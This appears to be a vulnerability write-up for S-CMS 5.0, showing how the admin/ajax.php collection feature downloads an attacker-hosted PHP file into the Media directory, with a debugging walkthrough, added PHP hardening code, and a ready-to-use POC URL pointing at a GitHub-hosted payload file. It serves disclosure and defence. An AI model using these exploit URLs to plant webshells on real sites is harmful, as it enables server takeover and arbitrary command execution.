1. First, download the latest version of S-CMS Enterprise Construction System Version 5.0.

2. Because the vulnerability is backend command execution, it requires logging in to the backend administrator account. The vulnerable interface address is: http://10.10.10.8/admin/ajax.php?Type=collection&ACTION=All&pageurl=http://10.10.8:88/1.tXt&ID=1 . Request it directly to test.

3. After the request succeeds, a randomly named PHP file is generated in the Media directory. This file is our one-sentence Trojan (webshell). Let's visit it and execute a command.

4. Let's analyze the cause of the vulnerability. The vulnerable code is in the admin/ajax.php file. Re-request the vulnerability URL: http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=http://10.10.10.8:88/1.txt&id=1 . Use PhpStorm to start debugging and set breakpoints at the following locations.

5. First, the fields in the SL_COMENT table are checked. If the data exists, execution continues downward.

6. All the data in the SL_COMENT table is extracted, and then the URL we supplied (http://10.10.8:88/1.txt) is passed in.

7. The extraction result is returned and assigned; we can see that the http://10.10.10.8:88/2.php link is parsed out of the return value.

8. Then the content of the 2.php file is downloaded and read; follow the downpic function.

9. The .php suffix of 2.php is kept as the saved file's suffix. The file name is built from the current time combined with a random 3-digit number. The content of 2.php is then written into the Media directory via the file_put_contents method.

10. Through the above operations, the Trojan is written into the system. We can execute arbitrary system commands by accessing the PHP file.
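The root cause in steps 8 to 10 is that the save step trusts two attacker-controlled things: the suffix of the remote URL and the bytes it returns. Below is an added example of how that step can be hardened; it is not S-CMS code and the class, method and directory names are assumptions made for this illustration. The stored extension is derived only from the sniffed content type (allowlisted image types), PHP tags inside the body are rejected, and the file name is generated server-side with a longer random token than the 3-digit number described above.

```php
<?php
declare(strict_types=1);

// Added example for this writeup; it is NOT S-CMS code. It hardens the
// collection feature's file-saving step described above (remote URL suffix
// reused, file_put_contents into Media). Class, method and directory names
// are assumptions made for the example.

final class CollectedImageSaver
{
    // Allowlist: detected MIME type => extension we are willing to write.
    // Anything not listed here (text/x-php, text/html, ...) is rejected.
    private const ALLOWED = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];

    public function __construct(private string $mediaDir) {}

    // Cheap first filter: the remote URL's path must end in an image suffix.
    // The vulnerable pattern took this suffix as the *output* name; here it
    // is only a pre-check and is never reused for the stored file.
    public static function urlLooksLikeImage(string $url): bool
    {
        $path = parse_url($url, PHP_URL_PATH);
        if (!is_string($path)) {
            return false;
        }
        $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
        return in_array($ext, array_values(self::ALLOWED), true);
    }

    // Save raw bytes fetched from a collection URL. Returns the stored path,
    // or null when the bytes are not an allowlisted image.
    public function save(string $bytes): ?string
    {
        // Decide the type from the real content, not from the URL.
        $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
        if (!is_string($mime) || !isset(self::ALLOWED[$mime])) {
            return null;
        }
        // Reject image/PHP polyglots: a valid header followed by PHP tags.
        if (stripos($bytes, '<?php') !== false || str_contains($bytes, '<?=')) {
            return null;
        }
        // Server-generated name; the extension comes from the allowlist only.
        $name = date('YmdHis') . '_' . bin2hex(random_bytes(8))
              . '.' . self::ALLOWED[$mime];
        $path = rtrim($this->mediaDir, '/') . '/' . $name;

        // 'x' mode creates exclusively, so an existing file is never overwritten.
        $fh = @fopen($path, 'x');
        if ($fh === false) {
            return null;
        }
        fwrite($fh, $bytes);
        fclose($fh);
        return $path;
    }
}

// Demonstration with constructed inputs (assumes ./Media exists and is writable).
$saver = new CollectedImageSaver(__DIR__ . '/Media');

// URL pre-check: a ".php" collection target is refused before any fetch.
var_dump(CollectedImageSaver::urlLooksLikeImage('http://10.10.10.8:88/2.php'));   // bool(false)
var_dump(CollectedImageSaver::urlLooksLikeImage('http://example.invalid/a.png')); // bool(true)

// Content check: a one-line PHP body is detected as text/x-php and refused.
var_dump($saver->save("<?php echo 'hello'; ?>")); // NULL

// A minimal 1x1 GIF (constructed bytes) is accepted and stored as *.gif.
$gif = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
     . "!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
     . "\x02\x02D\x01\x00;";
var_dump($saver->save($gif)); // string: .../Media/<time>_<token>.gif
```

As defense in depth, the Media directory should also be served with script execution disabled (for example a web-server rule that refuses to run .php under Media), so that even a file that slips past the content checks cannot be executed by visiting it.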

11. Two things are needed to use this vulnerability:

11.1. Create a text file in a data format similar to the SL_Collection table, because the system will request the data in the table and extract the URL link in SRC, which is 2.PHP.

11.2. 2.php is a one-sentence Trojan. Note that the file cannot be served from a PHP environment, because the request needs its content returned as-is, so I use Python to start an HTTP service.

![image](https://user-images.githubusercontent.com/113097106/227728467-f34ce272-5cce-46eb-82cd-fca1ea25d9ec.png)

12. Online POC link: http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=https://raw.githubusercontent.com/superjock1988/debug/main/1.txt&id=1 . You only need to modify the local server IP address.